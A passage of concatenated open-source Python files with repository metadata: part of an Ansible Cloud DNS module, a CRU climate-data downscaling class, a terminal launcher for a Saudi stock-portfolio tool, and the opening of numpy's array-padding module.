if zone_name[-1] != '.':
zone_name = zone_name + '.'
json_output = dict(
state = state,
zone = zone_name,
description = module.params['description']
)
# Build a connection object that we can use to connect with Google
# Cloud DNS.
gcdns = gcdns_connect(module, provider=PROVIDER)
# We need to check if the zone we're attempting to create already exists.
zone = _get_zone(gcdns, zone_name)
diff = dict()
# Build the 'before' diff
if zone is None:
diff['before'] = ''
diff['before_header'] = '<absent>'
else:
diff['before'] = dict(
zone = zone.domain,
description = zone.extra['description']
)
diff['before_header'] = zone_name
# Create or remove the zone.
if state == 'present':
diff['after'] = dict(
zone = zone_name,
description = module.params['description']
)
diff['after_header'] = zone_name
changed = create_zone(module, gcdns, zone)
elif state == 'absent':
diff['after'] = ''
diff['after_header'] = '<absent>'
changed = remove_zone(module, gcdns, zone)
module.exit_json(changed=changed, diff=diff, **json_output)
from ansible.module_utils.basic import *
from ansible.module_utils.gcdns import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
ua-snap/downscale
|
snap_scripts/old_scripts/tem_iem_older_scripts_april2018/tem_inputs_iem/old_code/cru_ts_downscaling_class_d.py
|
3
|
20625
|
# # #
# Downscale CRU Historical TS3.x data to a pre-processed climatology
# extent, resolution, reference system
#
# Author: Michael Lindgren ([email protected])
# # #
# import some modules
import rasterio, xray, os
import numpy as np
import pandas as pd
class DownscalingUtils( object ):
def write_gtiff( self, output_arr, template_meta, output_filename, compress=True ):
'''
DESCRIPTION:
------------
output a GeoTiff given a numpy ndarray, rasterio-style
metadata dictionary, and an output_filename.
If a multiband file is to be processed, the Longitude
dimension is expected to be the right-most.
--> dimensions should be (band, latitude, longitude)
ARGUMENTS:
----------
output_arr = [numpy.ndarray] with longitude as the right-most dimension
template_meta = [dict] rasterio-style raster meta dictionary. Typically
found in a template raster by: rasterio.open( fn ).meta
output_filename = [str] path to and name of the output GeoTiff to be
created. currently only 'GTiff' is supported.
compress = [bool] if True (default) LZW-compression is applied to the
output GeoTiff. If False, no compression is applied.
* this can also be added (along with many other gdal creation options)
to the template meta as a key value pair template_meta.update( compress='lzw' ).
See the rasterio documentation for more details. This is just a common one that is useful to set by default.
RETURNS:
--------
string path to the new output_filename created
'''
import os, warnings
if 'transform' in template_meta.keys():
_ = template_meta.pop( 'transform' )
if not output_filename.endswith( '.tif' ):
warnings.warn( 'output_filename does not end with ".tif"; it has been fixed for you.' )
output_filename = os.path.splitext( output_filename )[0] + '.tif'
if output_arr.ndim == 2:
# add in a new dimension - can get you into trouble with very large rasters...
output_arr = output_arr[ np.newaxis, ... ]
elif output_arr.ndim < 2:
raise ValueError( 'output_arr must have at least 2 dimensions' )
nbands, nrows, ncols = output_arr.shape
if template_meta[ 'count' ] != nbands:
raise ValueError( 'template_meta[ "count" ] must match output_arr bands' )
if compress == True and 'compress' not in template_meta.keys():
template_meta.update( compress='lzw' )
with rasterio.open( output_filename, 'w', **template_meta ) as out:
for band in range( 1, nbands+1 ):
out.write( output_arr[ band-1, ... ], band )
return output_filename
def shiftgrid( self, lon0, datain, lonsin, start=True, cyclic=360.0 ):
"""
Shift global lat/lon grid east or west.
.. tabularcolumns:: |l|L|
============== ====================================================
Arguments Description
============== ====================================================
lon0 starting longitude for shifted grid
(ending longitude if start=False). lon0 must be on
input grid (within the range of lonsin).
datain original data with longitude the right-most
dimension.
lonsin original longitudes.
============== ====================================================
.. tabularcolumns:: |l|L|
============== ====================================================
Keywords Description
============== ====================================================
start if True, lon0 represents the starting longitude
of the new grid. if False, lon0 is the ending
longitude. Default True.
cyclic width of periodic domain (default 360)
============== ====================================================
returns ``dataout,lonsout`` (data and longitudes on shifted grid).
"""
if np.fabs(lonsin[-1]-lonsin[0]-cyclic) > 1.e-4:
# Use all data instead of raise ValueError, 'cyclic point not included'
start_idx = 0
else:
# If cyclic, remove the duplicate point
start_idx = 1
if lon0 < lonsin[0] or lon0 > lonsin[-1]:
raise ValueError('lon0 outside of range of lonsin')
i0 = np.argmin(np.fabs(lonsin-lon0))
i0_shift = len(lonsin)-i0
if np.ma.isMA(datain):
dataout = np.ma.zeros(datain.shape,datain.dtype)
else:
dataout = np.zeros(datain.shape,datain.dtype)
if np.ma.isMA(lonsin):
lonsout = np.ma.zeros(lonsin.shape,lonsin.dtype)
else:
lonsout = np.zeros(lonsin.shape,lonsin.dtype)
if start:
lonsout[0:i0_shift] = lonsin[i0:]
else:
lonsout[0:i0_shift] = lonsin[i0:]-cyclic
dataout[...,0:i0_shift] = datain[...,i0:]
if start:
lonsout[i0_shift:] = lonsin[start_idx:i0+start_idx]+cyclic
else:
lonsout[i0_shift:] = lonsin[start_idx:i0+start_idx]
dataout[...,i0_shift:] = datain[...,start_idx:i0+start_idx]
return dataout,lonsout
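# A small illustration of the intended behaviour (illustrative values; in
# this module shiftgrid is used to rotate CRU 0.5-degree global grids
# between greenwich-centered and pacific-centered longitude conventions):
#
#   utils = DownscalingUtils()
#   lons = np.linspace(0., 359.5, 720)        # pacific-centered longitudes
#   data = np.random.rand(12, lons.size)      # e.g. 12 monthly slices
#   dat_shifted, lons_shifted = utils.shiftgrid(180., data, lons, start=False)
#   # dat_shifted / lons_shifted are rotated so longitudes start near -180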
def bounds_to_extent( self, bounds ):
'''
take input rasterio bounds object and return an extent
'''
l,b,r,t = bounds
return [ (l,b), (r,b), (r,t), (l,t), (l,b) ]
def padded_bounds( self, rst, npixels, crs ):
'''
expand the bounds of a raster by npixels in each direction
rst: rasterio raster object
npixels: tuple of 4 (left(-), bottom(-), right(+), top(+)) numbers of pixels to
expand in each direction. For 5 pixels in each direction it would look like
this: (-5, -5, 5, 5) or just in the right and top directions like this:
(0, 0, 5, 5).
crs: epsg code or proj4string defining the geospatial reference
system
returns: list of new bounds expanded by npixels
'''
import rasterio, os, sys
from shapely.geometry import Polygon
resolution = rst.res[0]
new_bounds = [ bound+(expand*resolution) for bound, expand in zip( rst.bounds, npixels ) ]
return new_bounds
def xyz_to_grid( self, x, y, z, grid, method='cubic', output_dtype=np.float32 ):
'''
interpolate points to a grid. simple wrapper around
scipy.interpolate.griddata. Points and grid must be
in the same coordinate system
x = 1-D np.array of x coordinates / x,y,z must be same length
y = 1-D np.array of y coordinates / x,y,z must be same length
z = 1-D np.array of z coordinates / x,y,z must be same length
grid = tuple of meshgrid as made using numpy.meshgrid()
order (xi, yi)
method = one of 'cubic', 'near', 'linear'
'''
from scipy.interpolate import griddata
zi = griddata( (x, y), z, grid, method=method )
zi = np.flipud( zi.astype( output_dtype ) )
return zi
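# Interpolation sketch (synthetic points; the grid tuple must come from
# numpy.meshgrid in (xi, yi) order, as the docstring notes):
#
#   utils = DownscalingUtils()
#   x = np.random.uniform(-180, 180, 500)
#   y = np.random.uniform(50, 75, 500)
#   z = np.sin(np.radians(x)) + np.cos(np.radians(y))
#   xi, yi = np.meshgrid(np.linspace(-180, 180, 100), np.linspace(50, 75, 50))
#   grid = utils.xyz_to_grid(x, y, z, (xi, yi), method='cubic')
#   # grid.shape == (50, 100), flipped north-up by the np.flipud call above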
def calc_anomalies( self, fn, variable, climatology_begin='1961', climatology_end='1990', absolute=True, *args, **kwargs ):
'''
calculate absolute or relative anomalies given a NetCDF file
of the Climatic Research Unit (CRU) Historical Time Series.
'''
import xray
ds = xray.open_dataset( fn )
try:
clim_ds = ds.loc[ {'time':slice(climatology_begin, climatology_end)} ]
climatology = clim_ds[ variable ].groupby( 'time.month' ).mean( 'time' )
except:
raise AttributeError( 'cannot slice netcdf based on the climatology years given; they must overlap the time axis.' )
# calculate anomalies
if absolute == True:
anomalies = ds[ variable ].groupby( 'time.month' ) - climatology
elif absolute == False:
anomalies = ds[ variable ].groupby( 'time.month' ) / climatology
else:
raise AttributeError( 'calc_anomalies: absolute can only be True or False' )
return anomalies
def interpolate_anomalies( self, anom_df, meshgrid_tuple, template_raster_fn, lons_pcll, \
src_transform, src_crs, src_nodata, output_filename, write_anomalies, *args, **kwargs ):
'''
run the interpolation to a grid, and reprojection / resampling to the Alaska / Canada rasters
extent, resolution, origin (template_raster).
This function is intended to be used to run a pathos.multiprocessing Pool's map function
across a list of pre-computed arguments.
ARGUMENTS:
---------
anom_df = []
meshgrid_tuple = []
template_raster_fn = []
lons_pcll = []
src_transform = []
src_crs = []
src_nodata = []
output_filename = []
write_anomalies = []
RETURNS:
-------
if write_anomalies == True: [str] path to the output filename generated
if write_anomalies == False: [tuple] interpolated NumPy ndarray representing the
interpolated anomalies and the rasterio-style metadata dictionary describing
the newly generated raster.
'''
from rasterio.warp import reproject, RESAMPLING
template_raster = rasterio.open( template_raster_fn )
template_meta = template_raster.meta
if 'transform' in template_meta.keys():
template_meta.pop( 'transform' )
# update some meta configs
template_meta.update( compress='lzw', crs={'init':'epsg:3338'} )
interp_arr = self.xyz_to_grid( np.array(anom_df['lon'].tolist()), \
np.array(anom_df['lat'].tolist()), \
np.array(anom_df['anom'].tolist()), grid=meshgrid_tuple, method='cubic' )
src_nodata = -9999.0 # nodata
interp_arr[ np.isnan( interp_arr ) ] = src_nodata
dat, lons = self.shiftgrid( 180., interp_arr, lons_pcll, start=False )
output_arr = np.empty_like( template_raster.read( 1 ) )
reproject( dat, output_arr, src_transform=src_transform, src_crs=src_crs, src_nodata=src_nodata, \
dst_transform=template_meta['affine'], dst_crs=template_meta['crs'],\
dst_nodata=None, resampling=RESAMPLING.cubic_spline, SOURCE_EXTRA=1000 )
# mask it with the internal mask in the template raster, where 0 is oob.
output_arr = np.ma.masked_where( template_raster.read_masks( 1 ) == 0, output_arr )
output_arr.fill_value = template_meta[ 'nodata' ]
output_arr = output_arr.filled()
if write_anomalies == True:
out = self.write_gtiff( output_arr, template_meta, output_filename, compress=True )
elif write_anomalies == False:
out = ( output_arr, template_meta )
else:
raise AttributeError( 'interpolate_anomalies: write_anomalies can be True or False only.' )
return out
def downscale( self, anom_arr, baseline_arr, output_filename, \
downscaling_operation, meta, post_downscale_function, *args, **kwargs ):
'''
downscale an anomaly array with a baseline array from the same period.
Arguments:
----------
anom_arr = [ np.ndarray ] 2-D NumPy array representing a raster domain.
anom/baseline arrays must be same shape.
baseline_arr = [ np.ndarray ] 2-D NumPy array representing a raster domain.
anom/baseline arrays must be same shape.
output_filename = [ str ] full path and output filename to be created
downscaling_operation = [ ]
meta = [ dict ] rasterio-style dictionary of raster metadata attributes. This
must jive with the dimensions and the data type of the array generated
through downscaling anom_arr with baseline_arr.
post_downscale_function = [ function ] a function that takes a 2-D downscaled
array as input and returns an array of the same shape / datatype. This
is typically used as a post-mortem for clamping the values from an output
downscaled array that may be slightly outside the range due to the
interpolation method. We currently use this to clamp the values of the hur
to 0-100.
Returns:
--------
output_filename of newly generated downscaled raster.
'''
def add( base, anom ):
return base + anom
def mult( base, anom ):
return base * anom
def div( base, anom ):
# this one may not be useful, but the placeholder is here
# return base / anom
raise NotImplementedError( 'div downscaling_operation is not implemented' )
operation_switch = { 'add':add, 'mult':mult, 'div':div }
if downscaling_operation not in operation_switch:
	raise AttributeError( 'downscale: incorrect downscaling_operation str' )
# [ CHECK ] This may be something better to be done before passing to this function
# both files need to be masked here since we use a RIDICULOUS oob value...
# for both tas and cld, values less than -200 are out of the range of acceptable values and it
# grabs the -3.4... mask values. so lets mask using this
baseline_arr = np.ma.masked_where( baseline_arr < -200, baseline_arr )
anom_arr = np.ma.masked_where( anom_arr < -200, anom_arr )
output_arr = operation_switch[ downscaling_operation ]( baseline_arr, anom_arr )
output_arr[ np.isinf( output_arr ) ] = meta[ 'nodata' ]
if post_downscale_function != None:
output_arr = post_downscale_function( output_arr )
if 'transform' in meta.keys():
# avoid the gdal geotransform deprecation warning
meta.pop( 'transform' )
with rasterio.open( output_filename, 'w', **meta ) as out:
out.write( output_arr, 1 )
return output_filename
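# Conceptual sketch of the downscaling arithmetic performed above (arrays are
# illustrative; the real call sites build baseline/anomaly grids from rasters):
#
#   baseline = np.full((10, 10), 5.0, dtype=np.float32)   # climatology value
#   anomaly = np.full((10, 10), 1.5, dtype=np.float32)    # CRU anomaly value
#   # absolute anomalies -> 'add'  : downscaled = baseline + anomaly
#   # relative anomalies -> 'mult' : downscaled = baseline * anomaly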
class DownscaleCRU( object ):
'''
methods to downscale the Climatic Research Unit's (CRU) Historical
Time Series data using a 12-month climatology pre-processed to the final
output domain and resolution. Typically we use a PRISM climatology or a
CRU CL2.0 climatology for these purposes.
'''
def __init__( self, cru_ts, clim_path, template_raster_fn, base_path, climatology_begin='1961', climatology_end='1990', ncores=2, \
absolute=True, metric='metric', variable=None, post_downscale_function=None, src_crs={'init':'epsg:4326'}, write_anomalies=True, *args, **kwargs ):
self.cru_ts = cru_ts
self.clim_path = clim_path
self.template_raster_fn = template_raster_fn
self.base_path = base_path
self.climatology_begin = climatology_begin
self.climatology_end = climatology_end
self.ncores = ncores
self.absolute = absolute
self.metric = metric
self.variable = variable
self.post_downscale_function = post_downscale_function
self.src_crs = src_crs
self.utils = DownscalingUtils()
self.write_anomalies = write_anomalies
@staticmethod
def _fn_month_grouper( fn, *args, **kwargs ):
'''
take a filename and return the month element of the naming convention
'''
return os.path.splitext( os.path.basename( fn ) )[0].split( '_' )[-2]
def _get_varname_cru( self, *args, **kwargs ):
'''
take as input the cru ts3* netcdf filename and return (if possible)
the name of the variable we want to work on from that netcdf.
Arguments:
nc_fn = [str] filepath to the cru ts* netcdf file used in downscaling
Returns:
the variable name as a string if it can be deduced, and errors if
the variable name cannot be deduced.
'''
ds = xray.open_dataset( self.cru_ts )
variables = ds.variables.keys()
variable = [ variable for variable in variables \
if variable not in [u'lon', u'lat', u'time'] ]
if len( variable ) == 1:
variable = variable[ 0 ]
else:
raise AttributeError( 'cannot deduce the variable from the file. supply nc_varname and re-run' )
return variable
def _get_years_cru( self, *args, **kwargs ):
ds = xray.open_dataset( self.cru_ts )
time = pd.DatetimeIndex( ds.time.values )
years = [ year.year for year in time ]
return years
def _get_version_cru( self, *args, **kwargs ):
version = ''.join( os.path.basename( self.cru_ts ).split( '.' )[:2] )
version = version.replace( 'ts', 'TS' ) # to follow convention
return version
def _interp_downscale_wrapper( self, args_dict, *args, **kwargs ):
'''
interpolate anomalies and downscale to the baseline arr
'''
output_filename = args_dict[ 'output_filename' ]
args_dict.update( output_filename=output_filename.replace( 'downscaled', 'anom' ) )
anom = self.utils.interpolate_anomalies( **args_dict )
if isinstance( anom, basestring ):
rst = rasterio.open( anom )
meta = rst.meta
meta.update( compress='lzw' )
anom_arr = rst.read( 1 )
elif isinstance( anom, tuple ): # isinstance( anom, tuple ):
anom_arr, meta = anom
else:
raise AttributeError( '_interp_downscale_wrapper: passed wrong instance type' )
args_dict.update( output_filename=output_filename, anom_arr=anom_arr, meta=meta )
return self.utils.downscale( **args_dict )
def downscale_cru_ts( self, *args, **kwargs ):
'''
run the CRU downscaling using the monthly climatology files given
'''
from pathos.mp_map import mp_map
import glob, affine, rasterio
nc_varname = self._get_varname_cru( )
# handle cases where the desired varname != one parsed from file.
if self.variable == None:
variable = nc_varname
else:
variable = self.variable
# build output dirs
anomalies_path = os.path.join( self.base_path, variable, 'anom' )
if not os.path.exists( anomalies_path ):
os.makedirs( anomalies_path )
downscaled_path = os.path.join( self.base_path, variable, 'downscaled' )
if not os.path.exists( downscaled_path ):
os.makedirs( downscaled_path )
# template setup
template_raster = rasterio.open( self.template_raster_fn )
template_meta = template_raster.meta
template_meta.update( crs={'init':'epsg:3338'} )
# make a mask with values of 0=nodata and 1=data
template_raster_mask = template_raster.read_masks( 1 ) # mask of band 1 is all we need
template_raster_mask[ template_raster_mask == 255 ] = 1
anomalies = self.utils.calc_anomalies( self.cru_ts, variable, absolute=self.absolute )
anomalies_pcll, lons_pcll = self.utils.shiftgrid( 0., anomalies, anomalies.lon.data ) # grabs lons from the xray ds
# mesh the lons and lats and unravel them to 1-D
lo, la = [ i.ravel() for i in np.meshgrid( lons_pcll, anomalies.lat ) ]
# convert into pandas.DataFrame and drop all the NaNs -- land-only dataset
anom_df_list = [ pd.DataFrame({ 'anom':i.ravel(), 'lat':la, 'lon':lo }).dropna( axis=0, how='any' ) for i in anomalies_pcll ]
xi, yi = np.meshgrid( lons_pcll, anomalies.lat.data )
# argument setup -- HARDWIRED
src_transform = affine.Affine( 0.5, 0.0, -180.0, 0.0, -0.5, 90.0 )
src_nodata = -9999.0
# output_filenames setup
years = np.unique( self._get_years_cru( self.cru_ts ) )
cru_ts_version = self._get_version_cru( self.cru_ts ) # works if naming convention stays same
months = [ i if len(i)==2 else '0'+i for i in np.arange( 1, 12+1, 1 ).astype( str ).tolist() ]
month_year = [ (month, year) for year in years for month in months ]
output_filenames = [ os.path.join( anomalies_path, '_'.join([ variable, self.metric, cru_ts_version, 'anom', month, str(year) ])+'.tif' )
for month, year in month_year ]
# NEW
# read in the pre-processed 12-month climatology
clim_list = sorted( glob.glob( os.path.join( self.clim_path, '*.tif' ) ) ) # this could catch you.
clim_dict = { month:rasterio.open( fn ).read( 1 ) for month, fn in zip( months, clim_list ) }
output_filenames = [ os.path.join( downscaled_path, '_'.join([ variable, self.metric, cru_ts_version, 'downscaled', month, str(year) ])+'.tif' )
for month, year in month_year ]
# set downscaling_operation based on self.absolute boolean
if self.absolute == True:
downscaling_operation = 'add'
elif self.absolute == False:
downscaling_operation = 'mult'
else:
raise AttributeError( 'downscaling operation: self.absolute must be boolean' )
args_list = [ { 'anom_df':anom_df,
'meshgrid_tuple':(xi, yi),
'template_raster_fn':self.template_raster_fn,
'lons_pcll':lons_pcll,
'src_transform':src_transform,
'src_crs':self.src_crs, \
'src_nodata':src_nodata,
'output_filename':out_fn,
'baseline_arr':clim_dict[ self._fn_month_grouper( out_fn ) ],
'downscaling_operation':downscaling_operation,
'post_downscale_function':self.post_downscale_function,
'write_anomalies':self.write_anomalies }
for anom_df, out_fn in zip( anom_df_list, output_filenames ) ]
# run anomalies interpolation and downscaling in a single go.
out = mp_map( lambda args: self._interp_downscale_wrapper( args_dict=args ), args_list, nproc=self.ncores )
return 'downscaling complete. files output at: %s' % self.base_path
if __name__ == '__main__':
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# example of use of the new DownscaleCRU / DownscalingUtils classes
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# example of post_downscale_function - pass in at DownscaleCRU()
def clamp_vals( x ):
''' clamp the values following the relative humidity downscaling '''
x[ (x > 100) & (x < 500) ] = 95
return x
# minimum required arguments
cru_ts = '/Data/Base_Data/Climate/World/CRU_grids/CRU_TS323/cru_ts3.23.1901.2014.cld.dat.nc'
clim_path = '/workspace/Shared/Tech_Projects/ALFRESCO_Inputs/project_data/TEM_Data/cru_october_final/cru_cl20/cld/akcan'
template_raster_fn = '/workspace/Shared/Tech_Projects/ALFRESCO_Inputs/project_data/TEM_Data/templates/tas_mean_C_AR5_GFDL-CM3_historical_01_1860.tif'
base_path = '/atlas_scratch/malindgren/CMIP5'
# run example
down = DownscaleCRU( cru_ts, clim_path, template_raster_fn, base_path, absolute=False, ncores=32 )
output = down.downscale_cru_ts()
|
mit
|
Logic-gate/TadawulStocks
|
launcher.py
|
1
|
5299
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TadawulStocks v 0.1 - launcher.py
# Copyright (C) <2014> mad_dev(A'mmer Almadani)
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL A'MMER ALMADANI BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Report any issues with this script to <[email protected]>
import npyscreen
import curses
from subprocess import Popen
from sys import exit
import threading
from collections import defaultdict
import ConfigParser
import time
from market.TadawulStocks import *
import re
__author__ = 'Amer Almadani'
__email__ = '[email protected]'
class ActionControllerSearch(npyscreen.ActionControllerSimple):
def create(self):
npyscreen.setTheme(npyscreen.Themes.TransparentThemeLightText)
self.add_action('^/.*', self.write2main, True)
def action(self, command, msg):
current = time.strftime('%c')
value = [current]
ThreadOpen(command).start()
value.append(msg)
self.parent.wMain.values = value
def write2main(self, command_line, prox, live):
self.parent.value.set_filter(command_line[1:])
self.parent.wMain.values = ['Command must start with /']
emulator = Conf().get('SYS', 'emulator')
command = Conf().get('SYS', 'command')
action_geo = Conf().get('ACTION', 'emulator_geo_title')
main_geo = Conf().get('MAIN', 'emulator_geo_title')
view_geo = Conf().get('VIEW', 'emulator_geo_title')
feed_geo = Conf().get('FEED', 'emulator_geo_title')
if str(command_line) == '/help':
self.parent.wMain.values = ["refresh: Launch the portfolio refresher(n); n = 10 sec",
"action: Launch the buy and sell window",
"my: Launch your portfolio view",
"stock: Show all stocks",
"fetch: Fetch prices from Tadawul.com.sa",
"log_sell: Show the sell log",
"log_buy: Show the buy log",]
elif str(command_line) == '/action':
self.action('''%s %s %s "python action.py"''' %(emulator, action_geo, command), 'Action has been started. You can buy and sell from it')
elif str(command_line) == '/refresh':
self.action('''%s %s %s "python -c 'from refresh import run; run()'"''' %(emulator, main_geo, command), 'Your portfolio is being refreshed every 10 seconds')
elif str(command_line) == '/my':
self.action('''%s %s %s "python view.py"''' %(emulator, view_geo, command), 'Your portfolio view has started. Issue fetch command to add new prices')
elif str(command_line) == '/fetch':
self.action('''%s %s %s "python feeder.py"''' %(emulator, feed_geo, command), 'Fetching data...')
elif str(command_line) == '/log_sell':
log_entry = [line.rstrip('\n') for line in open('log/sell.log')]
self.parent.wMain.values = log_entry
elif str(command_line) == '/log_buy':
log_entry = [line.rstrip('\n') for line in open('log/buy.log')]
self.parent.wMain.values = log_entry
elif str(command_line) == '/stock':
self.parent.wMain.values = GetList('All')
elif str(command_line) == '/exit':
exit('Goodbye!')
self.parent.wMain.display()
class ThreadOpen(threading.Thread):
def __init__(self, cmd):
threading.Thread.__init__(self)
self.cmd = cmd
def run(self):
Popen(self.cmd, shell=True)
class FmSearchActive(npyscreen.FormMuttActiveTraditional):
ACTION_CONTROLLER = ActionControllerSearch
class LaunchApp(npyscreen.NPSApp):
def main(self):
F = FmSearchActive()
#Thanks to N.Cole
del F.wMain.handlers[ord('l')] #remove 'l' as find
F.wMain.handlers.update({"^F": F.wMain.h_set_filter}) #add CTRL-F
F.wStatus1.value = "LOG"
F.wStatus2.value = "COMMAND"
F.wMain.values = ['Command must start with /','/help for commands']
F.edit()
if __name__ == "__main__":
def Conf():
config = ConfigParser.ConfigParser()
config.read('conf/info.conf')
return config
App = LaunchApp()
try:
App.run()
except KeyboardInterrupt:
print("Goodbye")
|
mpl-2.0
|
MaPePeR/numpy
|
numpy/lib/arraypad.py
|
41
|
52069
|
"""
The arraypad module contains a group of functions to pad values onto the edges
of an n-dimensional array.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
__all__ = ['pad']
###############################################################################
# Private utility functions.
def _arange_ndarray(arr, shape, axis, reverse=False):
"""
Create an ndarray of `shape` with increments along specified `axis`
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
shape : tuple of ints
Shape of desired array. Should be equivalent to `arr.shape` except
`shape[axis]` which may have any positive value.
axis : int
Axis to increment along.
reverse : bool
If False, increment in a positive fashion from 1 to `shape[axis]`,
inclusive. If True, the bounds are the same but the order reversed.
Returns
-------
padarr : ndarray
Output array sized to pad `arr` along `axis`, with linear range from
1 to `shape[axis]` along specified `axis`.
Notes
-----
The range is deliberately 1-indexed for this specific use case. Think of
this algorithm as broadcasting `np.arange` to a single `axis` of an
arbitrarily shaped ndarray.
"""
initshape = tuple(1 if i != axis else shape[axis]
for (i, x) in enumerate(arr.shape))
if not reverse:
padarr = np.arange(1, shape[axis] + 1)
else:
padarr = np.arange(shape[axis], 0, -1)
padarr = padarr.reshape(initshape)
for i, dim in enumerate(shape):
if padarr.shape[i] != dim:
padarr = padarr.repeat(dim, axis=i)
return padarr
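# Illustration of the broadcast arange described above (not part of the
# public API; shown for a small 2x3 input padded along axis 1):
#
#   a = np.zeros((2, 3))
#   _arange_ndarray(a, (2, 4), axis=1)
#   # -> array([[1, 2, 3, 4],
#   #           [1, 2, 3, 4]])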
def _round_ifneeded(arr, dtype):
"""
Rounds arr inplace if destination dtype is integer.
Parameters
----------
arr : ndarray
Input array.
dtype : dtype
The dtype of the destination array.
"""
if np.issubdtype(dtype, np.integer):
arr.round(out=arr)
def _prepend_const(arr, pad_amt, val, axis=-1):
"""
Prepend constant `val` along `axis` of `arr`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
val : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` constant `val` prepended along `axis`.
"""
if pad_amt == 0:
return arr
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
if val == 0:
return np.concatenate((np.zeros(padshape, dtype=arr.dtype), arr),
axis=axis)
else:
return np.concatenate(((np.zeros(padshape) + val).astype(arr.dtype),
arr), axis=axis)
def _append_const(arr, pad_amt, val, axis=-1):
"""
Append constant `val` along `axis` of `arr`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
val : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` constant `val` appended along `axis`.
"""
if pad_amt == 0:
return arr
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
if val == 0:
return np.concatenate((arr, np.zeros(padshape, dtype=arr.dtype)),
axis=axis)
else:
return np.concatenate(
(arr, (np.zeros(padshape) + val).astype(arr.dtype)), axis=axis)
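# Example of the constant prepend/append pair on a small array (illustrative;
# these helpers are normally reached through np.pad(..., mode='constant')):
#
#   a = np.array([[1, 2], [3, 4]])
#   _prepend_const(a, 1, 9, axis=1)   # -> [[9, 1, 2], [9, 3, 4]]
#   _append_const(a, 1, 9, axis=1)    # -> [[1, 2, 9], [3, 4, 9]]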
def _prepend_edge(arr, pad_amt, axis=-1):
"""
Prepend `pad_amt` to `arr` along `axis` by extending edge values.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, extended by `pad_amt` edge values appended along `axis`.
"""
if pad_amt == 0:
return arr
edge_slice = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
edge_arr = arr[edge_slice].reshape(pad_singleton)
return np.concatenate((edge_arr.repeat(pad_amt, axis=axis), arr),
axis=axis)
def _append_edge(arr, pad_amt, axis=-1):
"""
Append `pad_amt` to `arr` along `axis` by extending edge values.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to append.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, extended by `pad_amt` edge values prepended along
`axis`.
"""
if pad_amt == 0:
return arr
edge_slice = tuple(slice(None) if i != axis else arr.shape[axis] - 1
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
edge_arr = arr[edge_slice].reshape(pad_singleton)
return np.concatenate((arr, edge_arr.repeat(pad_amt, axis=axis)),
axis=axis)
def _prepend_ramp(arr, pad_amt, end, axis=-1):
"""
Prepend linear ramp along `axis`.
Parameters
----------
arr : ndarray
Input array of arbitrary shape.
pad_amt : int
Amount of padding to prepend.
end : scalar
Constant value to use. For best results should be of type `arr.dtype`;
if not `arr.dtype` will be cast to `arr.dtype`.
axis : int
Axis along which to pad `arr`.
Returns
-------
padarr : ndarray
Output array, with `pad_amt` values prepended along `axis`. The
prepended region ramps linearly from the edge value to `end`.
"""
if pad_amt == 0:
return arr
# Generate shape for final concatenated array
padshape = tuple(x if i != axis else pad_amt
for (i, x) in enumerate(arr.shape))
# Generate an n-dimensional array incrementing along `axis`
ramp_arr = _arange_ndarray(arr, padshape, axis,
reverse=True).astype(np.float64)
# Appropriate slicing to extract n-dimensional edge along `axis`
edge_slice = tuple(slice(None) if i != axis else 0
for (i, x) in enumerate(arr.shape))
# Shape to restore singleton dimension after slicing
pad_singleton = tuple(x if i != axis else 1
for (i, x) in enumerate(arr.shape))
# Extract edge, reshape to original rank, and extend along `axis`
edge_pad = arr[edge_slice].reshape(pad_singleton).repeat(pad_amt, axis)
# Linear ramp
slope = (end - edge_pad) / float(pad_amt)
ramp_arr = ramp_arr * slope
ramp_arr += edge_pad
_round_ifneeded(ramp_arr, arr.dtype)
# Ramp values will most likely be float, cast them to the same type as arr
